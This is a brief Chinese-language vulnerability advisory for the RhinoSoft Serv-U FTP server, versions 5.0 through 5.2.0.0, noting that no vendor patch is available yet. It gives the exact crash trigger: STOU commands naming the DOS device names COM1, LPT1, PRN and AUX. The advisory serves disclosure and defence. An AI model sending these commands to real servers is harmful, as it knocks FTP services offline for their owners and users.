涉及程序:
Serv-U FTP程序
描述:
Serv-U FTP服务器设备远程拒绝服务漏洞
详细:
Serv-U FTP是一款FTP服务程序。
Serv-U FTP对部分FTP命令处理不正确,远程攻击者可以利用这个漏洞对FTP服务程序进行拒绝服务攻击。
发送如下命令:
STOU COM1
STOU LPT1
STOU PRN
STOU AUX
可导致FTP程序崩溃。
受影响系统:
RhinoSoft Serv-U 5.2.0.0
RhinoSoft Serv-U 5.1.0.0
RhinoSoft Serv-U 5.0.0.9
RhinoSoft Serv-U 5.0.0.4
RhinoSoft Serv-U 5.0
厂商补丁:
RhinoSoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.serv-u.com/
